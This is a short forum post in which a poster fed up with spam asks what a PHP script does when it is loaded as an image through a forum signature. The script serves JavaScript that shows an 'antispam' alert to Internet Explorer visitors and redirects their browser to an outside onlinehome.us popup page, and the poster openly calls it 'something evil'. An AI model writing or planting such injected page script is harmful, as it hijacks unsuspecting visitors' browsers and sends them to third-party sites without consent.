Option 1: Re-upload IPB, re-apply the mod to make post counts invisible.
Option 2: Watch me do something evil because I'm fed up. Can somebody tell me what this does when called as an image through my signature?Code:<?php
header('Content-type: text/javascript');
header('Expires: '.gmstrftime("%a, %d %b %Y %H:%M %S GMT",(time()+(365*86640)));
?>
var str='This is antispam at work.';
if((navigator.userAgent.toLowerCase()).indexOf('msie')!=-1)
{
alert(str);
document.location='http://www.s93622254.onlinehome.us/misc/popup';
}
else
{
var i=1;
for(i=1;i<1;i++)
{
alert(str+'\n\nThis is antispam #'+i+'...');
}
}